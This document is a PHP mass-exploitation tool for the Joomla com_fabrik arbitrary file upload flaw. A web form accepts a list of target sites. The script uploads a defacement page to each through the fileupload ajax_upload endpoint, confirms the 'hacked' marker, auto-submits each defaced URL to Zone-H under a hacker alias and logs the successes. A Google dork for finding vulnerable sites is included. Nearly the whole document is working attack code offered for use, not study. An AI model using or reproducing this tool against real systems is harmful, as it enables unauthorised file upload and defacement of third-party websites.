AutoExploiter Com_Fabrik

1. <head><title>Com_Fabrik AutoExploiter ~</title></head>
2. <link href='https://fonts.googleapis.com/css?family=Ubuntu' rel='stylesheet' type='text/css'>
3. <style type="text/css">
4.  body { background:black;font-family: Ubuntu ; color:#fff; padding:50px}
5. .text {width:600px;height:200px;font-family: Ubuntu ; border: 1px solid darkred; }
6. .btn {background:#b70505;color:white;border: 1px solid #000; padding:6px 6px 6px 6px;font-family: Ubuntu ;}
7. .btn:hover {background:#c0bfbf;color:#000000; font-family: Ubuntu ; }
8. </style>
9. <center> <font new size="5">Com_Fabrik AutoExploiter ~</font><br>
10. <form action="" method="POST">
11. <textarea class="text" name="sites"></textarea>
12. <br>
13. <input class="btn" type="submit" value="door" name="die">
14. </form>
15. </center>
16. <?php
17.  
18. /** webBased By UstadCage_48 **/
19. /**
20.  
21. Joomla Component com_fabrik Arbitrary File Upload
22. Author: Et04 & bL@cKID
23.  
24. Google Dork
25. inurl:/index.php?option=com_fabrik
26.  
27. Auto Exploiter (Auto Upload & Auto Submit Zone-H)
28. Coded by: L0c4lh34rtz - IndoXploit
29. */
30.  
31. Class IDX_Fabrik {
32.     public $url;
33.  
34.     /* File deface anda dalam folder yang sama dengan tools ini */
35.     private $file = "48.htm";
36.  
37.     /* Nick Hacker Kalian / Nick Zone -H Kalian */
38.     /* Pastikan dalam script deface kalian terdapat kata HACKED */
39.     public $hacker  = "USTADCAGE_48";
40.  
41.    
42.  
43.     public function validUrl() {
44.         if(!preg_match("/^http:\/\//", $this->url) AND !preg_match("/^https:\/\//", $this->url)) {
45.             $url = "http://".$this->url;
46.             return $url;
47.         } else {
48.             return $this->url;
49.         }
50.     }
51.  
52.     public function curl($url, $data = null, $headers = null, $cookie = true) {
53.         $ch = curl_init();
54.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
55.               curl_setopt($ch, CURLOPT_URL, $url);
56.               curl_setopt($ch, CURLOPT_USERAGENT, "IndoXploitTools/1.1");
57.               //curl_setopt($ch, CURLOPT_VERBOSE, TRUE);
58.               curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
59.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
60.               curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
61.               curl_setopt($ch, CURLOPT_TIMEOUT, 5);
62.  
63.         if($data !== null) {
64.               curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
65.               curl_setopt($ch, CURLOPT_POST, TRUE);
66.               curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
67.         }
68.  
69.         if($headers !== null) {
70.               curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
71.         }
72.  
73.         if($cookie === true) {
74.               curl_setopt($ch, CURLOPT_COOKIE, TRUE);
75.               curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
76.               curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
77.         }
78.  
79.         $exec = curl_exec($ch);
80.         $info = curl_getinfo($ch);
81.  
82.               curl_close($ch);
83.  
84.         return (object) [
85.             "response"  => $exec,
86.             "info"      => $info
87.         ];
88.  
89.     }
90.  
91.     public function exploit() {
92.         $url  = $this->url."/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload";
93.         //$post = $this->curl($url, ["file" => "@L0c.htm"], null, false);
94.         $post = @shell_exec("curl --silent --connect-timeout 5 -X POST -F \"file=@".$this->file."\" \"$url\"");
95.         $result = (object) json_decode($post, true);
96.  
97.         if(isset($result->error)) {
98.             print "# ".parse_url($this->url, PHP_URL_HOST)." <font color=red>[FAILED]</font><br>";
99.         } else {
100.             if(isset($result->uri)) {
101.                 if(preg_match("/hacked/i", $this->curl($result->uri)->response)) {
102.                     print "# ".$result->uri." <font color=green>[OK]</font><br>";
103.                     $this->zoneh($result->uri);
104.                     $this->save($result->uri);
105.                 }
106.             }
107.         }
108.     }
109.  
110.     public function zoneh($url) {
111.         $post = $this->curl("http://www.zone-h.com/notify/single", "defacer=".$this->hacker."&domain1=$url&hackmode=1&reason=1&submit=Send",null,false);
112.         if(preg_match("/color=\"red\">(.*?)<\/font><\/li>/i", $post->response, $matches)) {
113.             if($matches[1] === "ERROR") {
114.                 preg_match("/<font color=\"red\">ERROR:<br\/>(.*?)<br\/>/i", $post->response, $matches2);
115.                 print "# Zone-H ($url) <font color=red>[ERROR]</font><br><br>";
116.             } else {
117.                 print "# Zone-H ($url) <font color=green>[OK]</font><br><br>";
118.             }
119.         }
120.     }
121.  
122.     public function save($isi) {
123.         $handle = fopen("result_fabrik.txt", "a+");
124.         fwrite($handle, "$isi<br>");
125.         fclose($handle);
126.     }
127.  
128. }
129.  
130. $fabrik = new IDX_Fabrik();
131.  
132. if($_POST['die']){
133. $open = explode("\n",$_POST['sites']);
134.  
135. foreach($open as $list) {
136.     $fabrik->url = trim($list);
137.     $fabrik->url = $fabrik->validUrl();
138.  
139.     echo $fabrik->exploit();
140. }
141. }